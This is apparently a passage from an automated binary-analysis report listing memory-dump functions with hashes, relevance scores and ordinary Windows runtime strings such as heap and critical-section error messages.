                                      • API ID:
                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-2558761708
                                      • Opcode ID: 831ff6a8ad38a3cc29f8425c78ae1fcefdf1a296fcd15f251bfdfc44bb16fedd
                                      • Instruction ID: a7c684acae5882da05310a1f56389035d836614af81a2d6e48d29f3e9b3591bc
                                      • Opcode Fuzzy Hash: 831ff6a8ad38a3cc29f8425c78ae1fcefdf1a296fcd15f251bfdfc44bb16fedd
                                      • Instruction Fuzzy Hash: AC11D3317241029FDB29DB1EE484F35B7A9FF80629F148469E40FCB251E638D881C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A3E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      • API String ID: 0-197956300
                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction ID: be9341973170fe3f5f69648a35f78dfa841e850642dfa483a99babc828a14a79
                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction Fuzzy Hash: 42918F716043429FE725CF29C941B5BBBE6AFC4714F18892DF699CB280E774E904CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019F51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: 54c6c7a828bc45174e5ede7886220de53c4d1cb590de43daa6d35479e7834e3e
                                      • Instruction ID: 2b9c6f087415d6bdd8d94fc64a3c758873ab4440d199d446ffe5519124ed0b14
                                      • Opcode Fuzzy Hash: 54c6c7a828bc45174e5ede7886220de53c4d1cb590de43daa6d35479e7834e3e
                                      • Instruction Fuzzy Hash: C6515CB5A00709EFEB25DFA8C980AADBBF9FF48704F15442DE64DEB251D6B19900CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199B9A5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 885266447-0
                                      • Opcode ID: 83da3948e5158e1fba38b6629dcedbba5ef94d2414402bbdb9d59abd1b07adb7
                                      • Instruction ID: 6df3bb3d8b372464f709d0fce8be097fe10db1cba071765e071ddf8f4c92ba50
                                      • Opcode Fuzzy Hash: 83da3948e5158e1fba38b6629dcedbba5ef94d2414402bbdb9d59abd1b07adb7
                                      • Instruction Fuzzy Hash: 90516B71A09301CFCB21CF6DD080D2ABBE9FB88605F14896EE58A87355D739EC40CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0197B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: _vswprintf_s
                                      • String ID:
                                      • API String ID: 677850445-0
                                      • Opcode ID: ecb2057ba177a18d843710cedecf5e7b63049c57daea2961f5e2095003d1b100
                                      • Instruction ID: 3b55d3b6646bc02d1d8c1015091801750036e11d2674313fe2421f479c20c455
                                      • Opcode Fuzzy Hash: ecb2057ba177a18d843710cedecf5e7b63049c57daea2961f5e2095003d1b100
                                      • Instruction Fuzzy Hash: 54510171D0025A8FEF31CF68C985BAEBBB4BF40751F1081ADD85DABA82D7704941CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: PATH
                                      • API String ID: 0-1036084923
                                      • Opcode ID: 58e43941128d38f9f9460c374b7e19ea0ab23120c1d3c024b1b4b79c26bce8cb
                                      • Instruction ID: 8c5c36c577e56beb382cd038ac3e15c5a601ef6d7927bf8f8e3e561d74fc94b4
                                      • Opcode Fuzzy Hash: 58e43941128d38f9f9460c374b7e19ea0ab23120c1d3c024b1b4b79c26bce8cb
                                      • Instruction Fuzzy Hash: 87C1D2B5D00219DFDB25DF98C980BADBBF5FF88740F884429E909BB250D734A945CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019AFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                      Download Yara Rule
                                      Strings
                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 019EBE0F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                      • API String ID: 0-865735534
                                      • Opcode ID: cd94c7fce1dc2b8821d15a9389efd974f01d4802d44764b9964173bb424e86db
                                      • Instruction ID: f246753675d2b3a29cf617b8afbc4ed3c57432f266f90066d42a0bb64ef2fdd2
                                      • Opcode Fuzzy Hash: cd94c7fce1dc2b8821d15a9389efd974f01d4802d44764b9964173bb424e86db
                                      • Instruction Fuzzy Hash: 4CA12271B006068BEB26DF69C454B7EB7F8AF48711F04496DEA0ECB681DB34D8498BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01972D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Re-Waiting
                                      • API String ID: 0-316354757
                                      • Opcode ID: 13ebc184afa849c6ae8befb14d6646008eac5390814bacbdced1f6e6cba842a8
                                      • Instruction ID: 8c5fbd25d0c390c3c229b7791c1b5f16c668b6f7c31d53dc2b266902f471babb
                                      • Opcode Fuzzy Hash: 13ebc184afa849c6ae8befb14d6646008eac5390814bacbdced1f6e6cba842a8
                                      • Instruction Fuzzy Hash: 11613731A106059FEB32DF6CC884B7EBBEAEF44B14F140A69D95DA72C1D734A901C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A40EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 3aae6e8bae11e11a105b05a0192e43deba013d35a478c2c9bb481f782192172b
                                      • Instruction ID: bbafd6d5869f56c4edbba76e032b8c3bd84186688ae710c8d82f381e53e145be
                                      • Opcode Fuzzy Hash: 3aae6e8bae11e11a105b05a0192e43deba013d35a478c2c9bb481f782192172b
                                      • Instruction Fuzzy Hash: 4A518C713043429FE325DF28D984B5BBBE9EBC4614F04092CFA9697290D675E846CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019AF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction ID: f452eda9edb029153a282baf6a4715e674763cc883a2660503614cf4913c02fa
                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction Fuzzy Hash: BE517C715047159FC321DF19C840A6BBBF8FF88714F00892EFA9987690E7B4E904CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019F3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryHash
                                      • API String ID: 0-2202222882
                                      • Opcode ID: 7f9b7b511c08af5c78fbe814c9bf454b3721be20d3f01e4fe37e25bbad165776
                                      • Instruction ID: e757d9d2475acda52a24580f1240543c1c9f1406e7b710617adf348df7b77fe5
                                      • Opcode Fuzzy Hash: 7f9b7b511c08af5c78fbe814c9bf454b3721be20d3f01e4fe37e25bbad165776
                                      • Instruction Fuzzy Hash: E74133B1D0052DAADB21DA54CD85FEEB77CAB44714F0045A9EB0DAB240DB349F88CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A405AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction ID: 931e318d77355df87f8527a377958f2e07be3a90d240028ddf1a1d36a6bbfcbc
                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction Fuzzy Hash: F031E2322043066BE710DF28CE84F97BBD9ABC4754F144229FB59DB280E6B0E904CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019F3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryName
                                      • API String ID: 0-215506332
                                      • Opcode ID: b262164d4cabe86d6bab34e2ff5b833c808bd07d35ab96cabd435476841ffb29
                                      • Instruction ID: 941fb700d5ecb833cb2e20f045ae5a15ed7692508f66608b9e3c0479d54a4dfa
                                      • Opcode Fuzzy Hash: b262164d4cabe86d6bab34e2ff5b833c808bd07d35ab96cabd435476841ffb29
                                      • Instruction Fuzzy Hash: 7731D472D0051AFFDB15DA58C945D6BBBB8FB80724F11816DAA1CA7250D6349F40CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019AD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 72394f7206f7281b6ad49d2a664fd4f8455090ea9f1946a8969c25d7dd935943
                                      • Instruction ID: f35dbf3975539becd21cf15ccc5357b2d4fd630b2ddd95d30f4c29955b509385
                                      • Opcode Fuzzy Hash: 72394f7206f7281b6ad49d2a664fd4f8455090ea9f1946a8969c25d7dd935943
                                      • Instruction Fuzzy Hash: 88318DB5508305AFC721DF68C9809AFBBE8FBD5658F40092EF99983650DA34DD09CBD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01981B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: WindowsExcludedProcs
                                      • API String ID: 0-3583428290
                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction ID: bfd18e07a20d571337e7944f7bd9116fc7b951e37e39995b1f25b6621418eb84
                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction Fuzzy Hash: 9721DA77901129AFDB22AA9DC980F5B7B6DEF81656F058435FE0CDB200D630DD02D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Actx
                                      • API String ID: 0-89312691
                                      • Opcode ID: c4e68f333f395bbe2afb3fd90605fa4b3a29829b55213a009d6889391d3c80d6
                                      • Instruction ID: bfc76283f48911f33175e25b0a142fc5a2f41292d298ff8e0a4fd87630ad4ab6
                                      • Opcode Fuzzy Hash: c4e68f333f395bbe2afb3fd90605fa4b3a29829b55213a009d6889391d3c80d6
                                      • Instruction Fuzzy Hash: F8119035308B028BFF254E1D8494B3EFEDDEB85726F25492AE56DCB391DA70C8408341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A28DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      Strings
                                      • Critical error detected %lx, xrefs: 01A28E21
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Critical error detected %lx
                                      • API String ID: 0-802127002
                                      • Opcode ID: a69423f97d2ad08af1108167ff547f0ca14d5b155bb814613ad23faf88411ffe
                                      • Instruction ID: f70a47066b1961bef93243fed232cdad9c3829be52812e3f23397a9dd06f25f7
                                      • Opcode Fuzzy Hash: a69423f97d2ad08af1108167ff547f0ca14d5b155bb814613ad23faf88411ffe
                                      • Instruction Fuzzy Hash: BF1157B1D14348EBDF29CFA8850579CBBF0BB54B14F24426EE5A9AB282C3385602CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A0FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      Strings
                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A0FF60
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                      • API String ID: 0-1911121157
                                      • Opcode ID: ab00487995a5f6623e30441107880cae38d50a8b4946135715033f1f3a27e2e3
                                      • Instruction ID: ada3cad6e761efdcfd658c4c6cff2072f52b230d2b92d0b5f33d3ca02bf69d6b
                                      • Opcode Fuzzy Hash: ab00487995a5f6623e30441107880cae38d50a8b4946135715033f1f3a27e2e3
                                      • Instruction Fuzzy Hash: 4811D275920644EFDB27DF94C948FA8BBB1FF48B04F148458F608AB6A1C7399940DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A45BA5, Relevance: .6, Instructions: 592COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9803dcf00ff90588ef51a93457153b70537e0d8485e4ec9e606abf0aaff7a72
                                      • Instruction ID: fa63679f4fadc2c6e2422b0bfc6886c379974a7dd2558e17729a1d4d76ab5b7e
                                      • Opcode Fuzzy Hash: a9803dcf00ff90588ef51a93457153b70537e0d8485e4ec9e606abf0aaff7a72
                                      • Instruction Fuzzy Hash: 56425B75D00269CFDB24CF68C980BA9BBB1FF89304F1581AAD94DEB242D774A985CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01994120, Relevance: .4, Instructions: 444COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e399bcd2026cb2202425feef9b53cd806738163a48533fad4c4547a0964d122
                                      • Instruction ID: 13c82418038f751bf2c19b17c5a3a46c1630ee93c684ec5fd6dfdac612011c6d
                                      • Opcode Fuzzy Hash: 4e399bcd2026cb2202425feef9b53cd806738163a48533fad4c4547a0964d122
                                      • Instruction Fuzzy Hash: E1F17E706082118FDB26CF6DC580A7AB7E5FF98715F04896EF58ACB250E734D892CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A20A0, Relevance: .4, Instructions: 420COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5b15677219715422cbb7bab650650d14be37b87c03f2a5c0914be7f920cd217
                                      • Instruction ID: d56ae1d011aba4222e906da54a22dc25777c3fbd6e7af0fe6c69e6f019f1bc8f
                                      • Opcode Fuzzy Hash: f5b15677219715422cbb7bab650650d14be37b87c03f2a5c0914be7f920cd217
                                      • Instruction Fuzzy Hash: A4F115396083019FEB26CB2CC444B6A7BE9BFC5318F45891DE99D8B291D734D845CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0198D5E0, Relevance: .4, Instructions: 353COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b91000528c9bf606aa6a8f9248826ae4d9bd61eb6167f86e4c392b11a039949
                                      • Instruction ID: 5da52b172ba270fad1d666eb361756e28a83694444b58752547f043c54f8ff9a
                                      • Opcode Fuzzy Hash: 0b91000528c9bf606aa6a8f9248826ae4d9bd61eb6167f86e4c392b11a039949
                                      • Instruction Fuzzy Hash: 11E10370A0135ACFEB35EF68C880B69B7F9BF86304F054199D90E97291DB349981CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0198849B, Relevance: .3, Instructions: 290COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d867e362c153e2f8af9423e6db3ee03f87fd636553f5b95e8c3b59ba5dc9265e
                                      • Instruction ID: 1e294fcd6d3ef648dd5d2c3154c3fd031d0478916b7358d61ef3b7868a1d76f9
                                      • Opcode Fuzzy Hash: d867e362c153e2f8af9423e6db3ee03f87fd636553f5b95e8c3b59ba5dc9265e
                                      • Instruction Fuzzy Hash: C9B16F74E00209DFDB25EFE9C980EADBBB9FF84308F508529E509AB255D774A941CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A513A, Relevance: .3, Instructions: 258COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1eba4b2c3fdac22d3259945b8901c7888a9bb01b1a5cd1c493e0ca3cdd244bac
                                      • Instruction ID: 9b4ded7e694e04a7011f46f2ba2480322b6e4049cec506711b601aebbe8d53c0
                                      • Opcode Fuzzy Hash: 1eba4b2c3fdac22d3259945b8901c7888a9bb01b1a5cd1c493e0ca3cdd244bac
                                      • Instruction Fuzzy Hash: 02C134756083818FE355CF28C580A6AFBF1BF88304F54496EF9998B352D771E985CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A03E2, Relevance: .3, Instructions: 254COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6e6228b72133ec3367f55c5bc54a401050e034002b904b43cab721ba2e9b3aa
                                      • Instruction ID: c03783d1856085a5ce07c1d3497ff3a0447deffbf5219a86c60e39a439574feb
                                      • Opcode Fuzzy Hash: f6e6228b72133ec3367f55c5bc54a401050e034002b904b43cab721ba2e9b3aa
                                      • Instruction Fuzzy Hash: FE913A31E00215AFEB329B6DC848BAD7BE8AB41715F090265FA59EB2D1E7749C44C7C1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0197C600, Relevance: .2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 189fc0a924108fd14f23ab31aa530b91b83880e3b720849a81023e874cd8deae
                                      • Instruction ID: c11aac7f099c95b1cd74c38c64761d203bb743d6670643cdda4f777348938d7d
                                      • Opcode Fuzzy Hash: 189fc0a924108fd14f23ab31aa530b91b83880e3b720849a81023e874cd8deae
                                      • Instruction Fuzzy Hash: 1D8193756042469BDB2BCE98C884E7A77E9EF84254F18486AEE4D9B241D330DD41CBE3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A0B8D0, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe3e37ecd6cf389dad99db7285dfe2c4f1ef49f80fb447f0672ff8f0c59c49f8
                                      • Instruction ID: 9db8eb63b225f21385d0d73827729d2610afcf436370391578c89bb205a7b2ed
                                      • Opcode Fuzzy Hash: fe3e37ecd6cf389dad99db7285dfe2c4f1ef49f80fb447f0672ff8f0c59c49f8
                                      • Instruction Fuzzy Hash: F971023A240702AFE733CF18DA80F56BBB5EF84724F144928E659872E0DB70E941CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019F6DC9, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction ID: 29da54ad88c133935d7d04cefca43f506dda1699ff12c9a2df8af83ff6863aa3
                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction Fuzzy Hash: 03717171900609FFDB15DFA8C984EEEBBB9FF88714F144469E609E7250DB30AA41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019752A5, Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e19fb33e75fbbe58e20f489bddbcec93145aab16b6f1fa7ae2210288e0ff24a
                                      • Instruction ID: 4bdecfbde999dc29a63413d562b36b9dcd48dea31a83c8931247dfc25ed01bae
                                      • Opcode Fuzzy Hash: 9e19fb33e75fbbe58e20f489bddbcec93145aab16b6f1fa7ae2210288e0ff24a
                                      • Instruction Fuzzy Hash: 2751EB71114342ABE721EF68C944B2BBBE8FF90714F14491EF59D83651E770E800CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A2AE4, Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 68b0e99f4b2bc02c55eac7f8f48475dfb892aada17287253c6f10668d16de728
                                      • Instruction ID: d71632d12e2c55f511b5856d131c156f85414dca9742c74c666e18b91ee35b1c
                                      • Opcode Fuzzy Hash: 68b0e99f4b2bc02c55eac7f8f48475dfb892aada17287253c6f10668d16de728
                                      • Instruction Fuzzy Hash: 1751D27AA00115CFCB19CF1CC8809BDB7F5FB89700755845AE85A9B325E734AA89CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A3AE44, Relevance: .2, Instructions: 152COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b99e2c2f7a390928e735f6f7218ae836a210c33ece3427d3fb7aa0420ea245e1
                                      • Instruction ID: 7b2cde3c59a1a27591e49708f6fd62ffff68508fff6e5b654b68b7fa70560635
                                      • Opcode Fuzzy Hash: b99e2c2f7a390928e735f6f7218ae836a210c33ece3427d3fb7aa0420ea245e1
                                      • Instruction Fuzzy Hash: 0241C2B17042319BD72ADB29C894B3BBB99AFD4620F188319F996C72D4DB34D801C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199DBE9, Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a665af32d03964316424c79296c98b649aec9d53f1d284eb7b3bed295a6379cd
                                      • Instruction ID: 5776fa2ae39c78d87188f3d43b4015306366658b6773a8dcf499a98963cec0b8
                                      • Opcode Fuzzy Hash: a665af32d03964316424c79296c98b649aec9d53f1d284eb7b3bed295a6379cd
                                      • Instruction Fuzzy Hash: 36518A75E00206DFCF15CFACC4D0AAEBBF5BB88310F24855AD559A7344EB30AA84CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0198EF40, Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction ID: 3a333e3ba9d345bc137b5dd8294f2a2a4047bc0b26d21c45c25fda3fbf8d886e
                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction Fuzzy Hash: 12510330A04249DFEB21DF6CC1D0BAEBBB5AF45315F1881A8D54D97282C375A98AC741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A4740D, Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction ID: e54c34b3556d067de709ab23fea899d9bf1544c92d30c4d95182e2c2f9fff4bc
                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction Fuzzy Hash: AC518071500686DFDB16CF68C580A95BBB5FF85304F14C0AAE908DF212E771E946CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A2990, Relevance: .1, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16c8b007928e6ce525f5257b5d0e7cff4752f2a7a52ffef7b80ae66f117ae8cb
                                      • Instruction ID: c500a54ca1fbdec5190f2f07f1c4b1c2028d40cd6c7ec5f93ab3a388d45c8fbd
